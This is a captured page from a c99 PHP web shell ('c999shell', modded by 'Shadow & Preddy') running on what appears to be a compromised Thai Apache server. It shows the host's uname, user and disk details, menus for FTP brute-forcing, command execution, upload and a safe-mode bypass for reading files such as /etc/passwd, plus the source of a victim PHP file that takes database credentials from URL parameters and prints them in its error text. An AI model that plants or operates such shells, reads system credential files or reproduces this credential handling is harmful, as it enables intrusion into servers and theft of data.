110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/xmigratex/ drwxr-xr-x Free 52.27 GB of 127.8 GB (40.9%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/xmigratex/ drwxr-xr-x
Free 52.27 GB of 127.8 GB (40.9%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: cmp_detail.php (9.94 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |



';
echo '$otb_name '.$otb_name.'
';
echo '$moDB '.$moDB.'
';
echo '$motb_name '.$motb_name.'
';
echo '$cases '.$cases.'
';
*/
    $localhost_s = $_GET["h"];
    $localhost_u = $_GET["u"];
    $localhost_p = $_GET["p"];
//echo 'localhost_p : '.$localhost_p;
$ln_reg = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_reg) {
    echo " ";
    die(' Could not connect: ' . mysql_error()."$localhost_s, $localhost_u, $localhost_p");
    echo "";
}else{
    //echo "Connected $source_s successfully
";
}
$db_reg = mysql_select_db($oDB, $ln_reg);
mysql_query("SET NAMES UTF8", $ln_reg);
mysql_query("SET character_set_results=utf8", $ln_reg);
mysql_query("SET character_set_client=utf8", $ln_reg);
if (!$db_reg) {
    die ("Can\'t use $oDB : " . mysql_error());
}else{
	//echo "เชื่องต่อ $oDB สำเร็จ
";
}

$query = getQryPbriChkData($oDB,$otb_name,$moDB,$motb_name,$cases);
if($query!=''){
    $result = mysql_query($query, $ln_reg);
    $num_case1 = mysql_num_rows($result);
}else{
    $num_case1 = 0;
}

$header_case = array('1' =>' ข้อมูลพื้นฐานของสบช.ที่วิทยาลัยยังไม่อัพเดต ',
'2' => ' ข้อมูลระบบทะเบียนที่มีมากกว่าข้อมูลพื้นฐานของสบช. ',
'3' => ' ข้อมูลที่PKตรงกันแต่ข้อมูลภายในไม่เท่ากัน ');

?>
bool(false)

รายละเอียด $header_case[$cases] 
";
echo "ตาราง $oDB.$otb_name เทียบตาราง $moDB.$motb_name
";
echo "ข้อมูลที่แตกต่างทั้งหมด  $num_case1 แถว

";
?>
 ให้นำสคริปไป execute ทาง phpMyAdmin


:: Command execute ::
Enter:   Select:  



:: Shadow's tricks :D  ::

  
    Useful Commands 
    
    
      
        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  
   Kernel Info: 
      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  
    Php Safe-Mode Bypass (Read Files)
    


    
      
      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  
   Php Safe-Mode Bypass (List Directories):     
      

      Dir:  

 eg: /etc/


    
    




 :: Search ::  - regexp 
 :: Upload :: 
[ ok ]



:: Make Dir :: 
[ ok ] :: Make File :: 
[ ok ]

:: Go Dir ::  :: Go File :: 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0048 ]--